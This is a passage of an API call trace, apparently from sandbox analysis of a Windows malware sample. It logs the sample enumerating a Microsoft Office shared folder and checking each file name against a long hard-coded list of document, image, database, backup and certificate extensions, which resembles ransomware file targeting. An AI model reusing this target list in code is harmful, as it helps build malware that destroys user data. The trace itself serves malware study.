Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4068 [0035.901] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.901] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.901] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f75098 [0039.273] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x3fe70b8, Size=0x80000) returned 0x4370020 [0039.279] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f310 | out: lpFindFileData=0x2f2f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35bab100, ftCreationTime.dwHighDateTime=0x1bf3bda, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x35bab100, ftLastWriteTime.dwHighDateTime=0x1bf3bda, nFileSizeHigh=0x0, nFileSizeLow=0x4754, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00157_.WMF", cAlternateFileName="")) returned 1 [0039.279] lstrlenW (lpString="SO00157_.WMF") returned 12 [0039.279] lstrlenW (lpString=".1cd") returned 4 [0039.279] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0039.279] lstrlenW (lpString=".3ds") returned 4 [0039.279] lstrcmpiW (lpString1=".3ds", lpString2=".WMF") returned -1 [0039.279] lstrlenW (lpString=".3fr") returned 4 [0039.279] lstrcmpiW (lpString1=".3fr", lpString2=".WMF") returned -1 [0039.279] lstrlenW (lpString=".3g2") returned 4 [0039.279] lstrcmpiW (lpString1=".3g2", lpString2=".WMF") returned -1 [0039.279] lstrlenW (lpString=".3gp") returned 4 [0039.279] lstrcmpiW (lpString1=".3gp", lpString2=".WMF") returned -1 [0039.279] lstrlenW (lpString=".7z") returned 3 [0039.279] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0039.279] lstrlenW (lpString=".accda") returned 6 [0039.279] lstrcmpiW (lpString1=".accda", lpString2="7_.WMF") returned -1 [0039.279] lstrlenW (lpString=".accdb") returned 6 [0039.279] lstrcmpiW (lpString1=".accdb", lpString2="7_.WMF") returned -1 [0039.280] lstrlenW (lpString=".accdc") returned 6 [0039.280] lstrcmpiW (lpString1=".accdc", lpString2="7_.WMF") returned -1 [0039.280] lstrlenW (lpString=".accde") returned 6 [0039.280] lstrcmpiW (lpString1=".accde", lpString2="7_.WMF") returned -1 [0039.280] lstrlenW (lpString=".accdt") returned 6 [0039.280] lstrcmpiW (lpString1=".accdt", lpString2="7_.WMF") returned -1 [0039.280] lstrlenW (lpString=".accdw") returned 6 [0039.280] lstrcmpiW (lpString1=".accdw", lpString2="7_.WMF") returned -1 [0039.280] lstrlenW (lpString=".adb") returned 4 [0039.280] lstrcmpiW (lpString1=".adb", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".adp") returned 4 [0039.280] lstrcmpiW (lpString1=".adp", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".ai") returned 3 [0039.280] lstrcmpiW (lpString1=".ai", lpString2="WMF") returned -1 [0039.280] lstrlenW (lpString=".ai3") returned 4 [0039.280] lstrcmpiW (lpString1=".ai3", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".ai4") returned 4 [0039.280] lstrcmpiW (lpString1=".ai4", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".ai5") returned 4 [0039.280] lstrcmpiW (lpString1=".ai5", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".ai6") returned 4 [0039.280] lstrcmpiW (lpString1=".ai6", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".ai7") returned 4 [0039.280] lstrcmpiW (lpString1=".ai7", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".ai8") returned 4 [0039.280] lstrcmpiW (lpString1=".ai8", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".anim") returned 5 [0039.280] lstrcmpiW (lpString1=".anim", lpString2="_.WMF") returned -1 [0039.280] lstrlenW (lpString=".arw") returned 4 [0039.280] lstrcmpiW (lpString1=".arw", lpString2=".WMF") returned -1 [0039.280] lstrlenW (lpString=".as") returned 3 [0039.281] lstrcmpiW (lpString1=".as", lpString2="WMF") returned -1 [0039.281] lstrlenW (lpString=".asa") returned 4 [0039.281] lstrcmpiW (lpString1=".asa", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".asc") returned 4 [0039.281] lstrcmpiW (lpString1=".asc", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".ascx") returned 5 [0039.281] lstrcmpiW (lpString1=".ascx", lpString2="_.WMF") returned -1 [0039.281] lstrlenW (lpString=".asm") returned 4 [0039.281] lstrcmpiW (lpString1=".asm", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".asmx") returned 5 [0039.281] lstrcmpiW (lpString1=".asmx", lpString2="_.WMF") returned -1 [0039.281] lstrlenW (lpString=".asp") returned 4 [0039.281] lstrcmpiW (lpString1=".asp", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".aspx") returned 5 [0039.281] lstrcmpiW (lpString1=".aspx", lpString2="_.WMF") returned -1 [0039.281] lstrlenW (lpString=".asr") returned 4 [0039.281] lstrcmpiW (lpString1=".asr", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".asx") returned 4 [0039.281] lstrcmpiW (lpString1=".asx", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".avi") returned 4 [0039.281] lstrcmpiW (lpString1=".avi", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".avs") returned 4 [0039.281] lstrcmpiW (lpString1=".avs", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".backup") returned 7 [0039.281] lstrcmpiW (lpString1=".backup", lpString2="57_.WMF") returned -1 [0039.281] lstrlenW (lpString=".bak") returned 4 [0039.281] lstrcmpiW (lpString1=".bak", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".bay") returned 4 [0039.281] lstrcmpiW (lpString1=".bay", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".bd") returned 3 [0039.281] lstrcmpiW (lpString1=".bd", lpString2="WMF") returned -1 [0039.281] lstrlenW (lpString=".bin") returned 4 [0039.281] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".bmp") returned 4 [0039.281] lstrcmpiW (lpString1=".bmp", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".bz2") returned 4 [0039.281] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0039.281] lstrlenW (lpString=".c") returned 2 [0039.282] lstrcmpiW (lpString1=".c", lpString2="MF") returned -1 [0039.282] lstrlenW (lpString=".cdr") returned 4 [0039.282] lstrcmpiW (lpString1=".cdr", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cer") returned 4 [0039.282] lstrcmpiW (lpString1=".cer", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cf") returned 3 [0039.282] lstrcmpiW (lpString1=".cf", lpString2="WMF") returned -1 [0039.282] lstrlenW (lpString=".cfc") returned 4 [0039.282] lstrcmpiW (lpString1=".cfc", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cfm") returned 4 [0039.282] lstrcmpiW (lpString1=".cfm", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cfml") returned 5 [0039.282] lstrcmpiW (lpString1=".cfml", lpString2="_.WMF") returned -1 [0039.282] lstrlenW (lpString=".cfu") returned 4 [0039.282] lstrcmpiW (lpString1=".cfu", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".chm") returned 4 [0039.282] lstrcmpiW (lpString1=".chm", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cin") returned 4 [0039.282] lstrcmpiW (lpString1=".cin", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".class") returned 6 [0039.282] lstrcmpiW (lpString1=".class", lpString2="7_.WMF") returned -1 [0039.282] lstrlenW (lpString=".clx") returned 4 [0039.282] lstrcmpiW (lpString1=".clx", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".config") returned 7 [0039.282] lstrcmpiW (lpString1=".config", lpString2="57_.WMF") returned -1 [0039.282] lstrlenW (lpString=".cpp") returned 4 [0039.282] lstrcmpiW (lpString1=".cpp", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cr2") returned 4 [0039.282] lstrcmpiW (lpString1=".cr2", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".crt") returned 4 [0039.282] lstrcmpiW (lpString1=".crt", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".crw") returned 4 [0039.282] lstrcmpiW (lpString1=".crw", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".cs") returned 3 [0039.282] lstrcmpiW (lpString1=".cs", lpString2="WMF") returned -1 [0039.282] lstrlenW (lpString=".css") returned 4 [0039.282] lstrcmpiW (lpString1=".css", lpString2=".WMF") returned -1 [0039.282] lstrlenW (lpString=".csv") returned 4 [0039.283] lstrcmpiW (lpString1=".csv", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".cub") returned 4 [0039.283] lstrcmpiW (lpString1=".cub", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dae") returned 4 [0039.283] lstrcmpiW (lpString1=".dae", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dat") returned 4 [0039.283] lstrcmpiW (lpString1=".dat", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".db") returned 3 [0039.283] lstrcmpiW (lpString1=".db", lpString2="WMF") returned -1 [0039.283] lstrlenW (lpString=".dbf") returned 4 [0039.283] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dbx") returned 4 [0039.283] lstrcmpiW (lpString1=".dbx", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dc3") returned 4 [0039.283] lstrcmpiW (lpString1=".dc3", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dcm") returned 4 [0039.283] lstrcmpiW (lpString1=".dcm", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dcr") returned 4 [0039.283] lstrcmpiW (lpString1=".dcr", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".der") returned 4 [0039.283] lstrcmpiW (lpString1=".der", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dib") returned 4 [0039.283] lstrcmpiW (lpString1=".dib", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dic") returned 4 [0039.283] lstrcmpiW (lpString1=".dic", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".dif") returned 4 [0039.283] lstrcmpiW (lpString1=".dif", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".divx") returned 5 [0039.283] lstrcmpiW (lpString1=".divx", lpString2="_.WMF") returned -1 [0039.283] lstrlenW (lpString=".djvu") returned 5 [0039.283] lstrcmpiW (lpString1=".djvu", lpString2="_.WMF") returned -1 [0039.283] lstrlenW (lpString=".dng") returned 4 [0039.283] lstrcmpiW (lpString1=".dng", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".doc") returned 4 [0039.283] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0039.283] lstrlenW (lpString=".docm") returned 5 [0039.283] lstrcmpiW (lpString1=".docm", lpString2="_.WMF") returned -1 [0039.283] lstrlenW (lpString=".docx") returned 5 [0039.284] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0039.284] lstrlenW (lpString=".dot") returned 4 [0039.284] lstrcmpiW (lpString1=".dot", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dotm") returned 5 [0039.284] lstrcmpiW (lpString1=".dotm", lpString2="_.WMF") returned -1 [0039.284] lstrlenW (lpString=".dotx") returned 5 [0039.284] lstrcmpiW (lpString1=".dotx", lpString2="_.WMF") returned -1 [0039.284] lstrlenW (lpString=".dpx") returned 4 [0039.284] lstrcmpiW (lpString1=".dpx", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dqy") returned 4 [0039.284] lstrcmpiW (lpString1=".dqy", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dsn") returned 4 [0039.284] lstrcmpiW (lpString1=".dsn", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dt") returned 3 [0039.284] lstrcmpiW (lpString1=".dt", lpString2="WMF") returned -1 [0039.284] lstrlenW (lpString=".dtd") returned 4 [0039.284] lstrcmpiW (lpString1=".dtd", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dwg") returned 4 [0039.284] lstrcmpiW (lpString1=".dwg", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dwt") returned 4 [0039.284] lstrcmpiW (lpString1=".dwt", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".dx") returned 3 [0039.284] lstrcmpiW (lpString1=".dx", lpString2="WMF") returned -1 [0039.284] lstrlenW (lpString=".dxf") returned 4 [0039.284] lstrcmpiW (lpString1=".dxf", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".edml") returned 5 [0039.284] lstrcmpiW (lpString1=".edml", lpString2="_.WMF") returned -1 [0039.284] lstrlenW (lpString=".efd") returned 4 [0039.284] lstrcmpiW (lpString1=".efd", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".elf") returned 4 [0039.284] lstrcmpiW (lpString1=".elf", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".emf") returned 4 [0039.284] lstrcmpiW (lpString1=".emf", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".emz") returned 4 [0039.284] lstrcmpiW (lpString1=".emz", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".epf") returned 4 [0039.284] lstrcmpiW (lpString1=".epf", lpString2=".WMF") returned -1 [0039.284] lstrlenW (lpString=".eps") returned 4 [0039.285] lstrcmpiW (lpString1=".eps", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".epsf") returned 5 [0039.285] lstrcmpiW (lpString1=".epsf", lpString2="_.WMF") returned -1 [0039.285] lstrlenW (lpString=".epsp") returned 5 [0039.285] lstrcmpiW (lpString1=".epsp", lpString2="_.WMF") returned -1 [0039.285] lstrlenW (lpString=".erf") returned 4 [0039.285] lstrcmpiW (lpString1=".erf", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".exr") returned 4 [0039.285] lstrcmpiW (lpString1=".exr", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".f4v") returned 4 [0039.285] lstrcmpiW (lpString1=".f4v", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".fido") returned 5 [0039.285] lstrcmpiW (lpString1=".fido", lpString2="_.WMF") returned -1 [0039.285] lstrlenW (lpString=".flm") returned 4 [0039.285] lstrcmpiW (lpString1=".flm", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".flv") returned 4 [0039.285] lstrcmpiW (lpString1=".flv", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".frm") returned 4 [0039.285] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".fxg") returned 4 [0039.285] lstrcmpiW (lpString1=".fxg", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".geo") returned 4 [0039.285] lstrcmpiW (lpString1=".geo", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".gif") returned 4 [0039.285] lstrcmpiW (lpString1=".gif", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".grs") returned 4 [0039.285] lstrcmpiW (lpString1=".grs", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".gz") returned 3 [0039.285] lstrcmpiW (lpString1=".gz", lpString2="WMF") returned -1 [0039.285] lstrlenW (lpString=".h") returned 2 [0039.285] lstrcmpiW (lpString1=".h", lpString2="MF") returned -1 [0039.285] lstrlenW (lpString=".hdr") returned 4 [0039.285] lstrcmpiW (lpString1=".hdr", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".hpp") returned 4 [0039.285] lstrcmpiW (lpString1=".hpp", lpString2=".WMF") returned -1 [0039.285] lstrlenW (lpString=".hta") returned 4 [0039.285] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".htc") returned 4 [0039.286] lstrcmpiW (lpString1=".htc", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".htm") returned 4 [0039.286] lstrcmpiW (lpString1=".htm", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".html") returned 5 [0039.286] lstrcmpiW (lpString1=".html", lpString2="_.WMF") returned -1 [0039.286] lstrlenW (lpString=".icb") returned 4 [0039.286] lstrcmpiW (lpString1=".icb", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".ics") returned 4 [0039.286] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".iff") returned 4 [0039.286] lstrcmpiW (lpString1=".iff", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".inc") returned 4 [0039.286] lstrcmpiW (lpString1=".inc", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".indd") returned 5 [0039.286] lstrcmpiW (lpString1=".indd", lpString2="_.WMF") returned -1 [0039.286] lstrlenW (lpString=".ini") returned 4 [0039.286] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".iqy") returned 4 [0039.286] lstrcmpiW (lpString1=".iqy", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".j2c") returned 4 [0039.286] lstrcmpiW (lpString1=".j2c", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".j2k") returned 4 [0039.286] lstrcmpiW (lpString1=".j2k", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".java") returned 5 [0039.286] lstrcmpiW (lpString1=".java", lpString2="_.WMF") returned -1 [0039.286] lstrlenW (lpString=".jp2") returned 4 [0039.286] lstrcmpiW (lpString1=".jp2", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".jpc") returned 4 [0039.286] lstrcmpiW (lpString1=".jpc", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".jpe") returned 4 [0039.286] lstrcmpiW (lpString1=".jpe", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".jpeg") returned 5 [0039.286] lstrcmpiW (lpString1=".jpeg", lpString2="_.WMF") returned -1 [0039.286] lstrlenW (lpString=".jpf") returned 4 [0039.286] lstrcmpiW (lpString1=".jpf", lpString2=".WMF") returned -1 [0039.286] lstrlenW (lpString=".jpg") returned 4 [0039.287] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".jpx") returned 4 [0039.287] lstrcmpiW (lpString1=".jpx", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".js") returned 3 [0039.287] lstrcmpiW (lpString1=".js", lpString2="WMF") returned -1 [0039.287] lstrlenW (lpString=".jsf") returned 4 [0039.287] lstrcmpiW (lpString1=".jsf", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".json") returned 5 [0039.287] lstrcmpiW (lpString1=".json", lpString2="_.WMF") returned -1 [0039.287] lstrlenW (lpString=".jsp") returned 4 [0039.287] lstrcmpiW (lpString1=".jsp", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".kdc") returned 4 [0039.287] lstrcmpiW (lpString1=".kdc", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".kmz") returned 4 [0039.287] lstrcmpiW (lpString1=".kmz", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".kwm") returned 4 [0039.287] lstrcmpiW (lpString1=".kwm", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".lasso") returned 6 [0039.287] lstrcmpiW (lpString1=".lasso", lpString2="7_.WMF") returned -1 [0039.287] lstrlenW (lpString=".lbi") returned 4 [0039.287] lstrcmpiW (lpString1=".lbi", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".lgf") returned 4 [0039.287] lstrcmpiW (lpString1=".lgf", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".lgp") returned 4 [0039.287] lstrcmpiW (lpString1=".lgp", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".log") returned 4 [0039.287] lstrcmpiW (lpString1=".log", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".m1v") returned 4 [0039.287] lstrcmpiW (lpString1=".m1v", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".m4a") returned 4 [0039.287] lstrcmpiW (lpString1=".m4a", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".m4v") returned 4 [0039.287] lstrcmpiW (lpString1=".m4v", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".max") returned 4 [0039.287] lstrcmpiW (lpString1=".max", lpString2=".WMF") returned -1 [0039.287] lstrlenW (lpString=".md") returned 3 [0039.287] lstrcmpiW (lpString1=".md", lpString2="WMF") returned -1 [0039.288] lstrlenW (lpString=".mda") returned 4 [0039.288] lstrcmpiW (lpString1=".mda", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mdb") returned 4 [0039.288] lstrcmpiW (lpString1=".mdb", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mde") returned 4 [0039.288] lstrcmpiW (lpString1=".mde", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mdf") returned 4 [0039.288] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mdw") returned 4 [0039.288] lstrcmpiW (lpString1=".mdw", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mef") returned 4 [0039.288] lstrcmpiW (lpString1=".mef", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mft") returned 4 [0039.288] lstrcmpiW (lpString1=".mft", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mfw") returned 4 [0039.288] lstrcmpiW (lpString1=".mfw", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mht") returned 4 [0039.288] lstrcmpiW (lpString1=".mht", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mhtml") returned 6 [0039.288] lstrcmpiW (lpString1=".mhtml", lpString2="7_.WMF") returned -1 [0039.288] lstrlenW (lpString=".mka") returned 4 [0039.288] lstrcmpiW (lpString1=".mka", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mkidx") returned 6 [0039.288] lstrcmpiW (lpString1=".mkidx", lpString2="7_.WMF") returned -1 [0039.288] lstrlenW (lpString=".mkv") returned 4 [0039.288] lstrcmpiW (lpString1=".mkv", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mos") returned 4 [0039.288] lstrcmpiW (lpString1=".mos", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mov") returned 4 [0039.288] lstrcmpiW (lpString1=".mov", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mp3") returned 4 [0039.288] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mp4") returned 4 [0039.288] lstrcmpiW (lpString1=".mp4", lpString2=".WMF") returned -1 [0039.288] lstrlenW (lpString=".mpeg") returned 5 [0039.288] lstrcmpiW (lpString1=".mpeg", lpString2="_.WMF") returned -1 [0039.288] lstrlenW (lpString=".mpg") returned 4 [0039.288] lstrcmpiW (lpString1=".mpg", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".mpv") returned 4 [0039.289] lstrcmpiW (lpString1=".mpv", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".mrw") returned 4 [0039.289] lstrcmpiW (lpString1=".mrw", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".msg") returned 4 [0039.289] lstrcmpiW (lpString1=".msg", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".mxl") returned 4 [0039.289] lstrcmpiW (lpString1=".mxl", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".myd") returned 4 [0039.289] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".myi") returned 4 [0039.289] lstrcmpiW (lpString1=".myi", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".nef") returned 4 [0039.289] lstrcmpiW (lpString1=".nef", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".nrw") returned 4 [0039.289] lstrcmpiW (lpString1=".nrw", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".obj") returned 4 [0039.289] lstrcmpiW (lpString1=".obj", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".odb") returned 4 [0039.289] lstrcmpiW (lpString1=".odb", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".odc") returned 4 [0039.289] lstrcmpiW (lpString1=".odc", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".odm") returned 4 [0039.289] lstrcmpiW (lpString1=".odm", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".odp") returned 4 [0039.289] lstrcmpiW (lpString1=".odp", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".ods") returned 4 [0039.289] lstrcmpiW (lpString1=".ods", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".oft") returned 4 [0039.289] lstrcmpiW (lpString1=".oft", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".one") returned 4 [0039.289] lstrcmpiW (lpString1=".one", lpString2=".WMF") returned -1 [0039.289] lstrlenW (lpString=".onepkg") returned 7 [0039.289] lstrcmpiW (lpString1=".onepkg", lpString2="57_.WMF") returned -1 [0039.289] lstrlenW (lpString=".onetoc2") returned 8 [0039.289] lstrcmpiW (lpString1=".onetoc2", lpString2="157_.WMF") returned -1 [0039.289] lstrlenW (lpString=".opt") returned 4 [0039.290] lstrcmpiW (lpString1=".opt", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".oqy") returned 4 [0039.290] lstrcmpiW (lpString1=".oqy", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".orf") returned 4 [0039.290] lstrcmpiW (lpString1=".orf", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".p12") returned 4 [0039.290] lstrcmpiW (lpString1=".p12", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".p7b") returned 4 [0039.290] lstrcmpiW (lpString1=".p7b", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".p7c") returned 4 [0039.290] lstrcmpiW (lpString1=".p7c", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pam") returned 4 [0039.290] lstrcmpiW (lpString1=".pam", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pbm") returned 4 [0039.290] lstrcmpiW (lpString1=".pbm", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pct") returned 4 [0039.290] lstrcmpiW (lpString1=".pct", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pcx") returned 4 [0039.290] lstrcmpiW (lpString1=".pcx", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pdd") returned 4 [0039.290] lstrcmpiW (lpString1=".pdd", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pdf") returned 4 [0039.290] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pdp") returned 4 [0039.290] lstrcmpiW (lpString1=".pdp", lpString2=".WMF") returned -1 [0039.290] lstrlenW (lpString=".pef") returned 4 [0039.290] lstrcmpiW (lpString1=".pef", lpString2=".WMF") 